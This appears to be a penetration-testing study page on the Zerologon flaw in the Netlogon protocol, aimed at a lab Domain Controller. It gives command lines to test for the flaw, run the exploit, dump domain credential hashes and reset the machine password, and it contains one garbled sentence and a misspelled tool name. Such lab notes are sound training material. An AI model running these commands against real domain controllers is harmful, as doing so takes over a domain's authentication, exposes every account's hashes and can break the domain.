Zerologon

Overview

The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Controller.

We are essentially the Domain Controller authentication to null so we can authenticate without a password.

This vulnerability can BREAK the Domain Controller so exploiting it in a real engagement shouldn't be done

Now here's how to do it :D

Zerologon Attack

First check if the Domain Controller is vulnerable with this script

./zerologon_tester.py PNPT-DC 192.168.1.129

Exploit the vulnerability with this script then dump hashes

python3 cve-2020-1472-exploit.py PNPT-DC 192.168.1.129
imapcket-secretsdump -just-dc PNPT/PNPT-DC\$@192.168.1.129

Restore Domain Controller back to normal

python3 restorepassword.py PNPT/PNPT-DC@PNPT-DC -target-ip 192.168.1.129 -hexpass XXX

PreviousCritical Active Directory CVE's NextPrintNightmare

hashtagOverview

hashtagZerologon Attack

hashtagFirst check if the Domain Controller is vulnerable with this scriptarrow-up-right

hashtagExploit the vulnerability with this scriptarrow-up-right then dump hashes

hashtagRestore Domain Controller back to normal

Overview

Zerologon Attack

First check if the Domain Controller is vulnerable with this script

Exploit the vulnerability with this script then dump hashes

Restore Domain Controller back to normal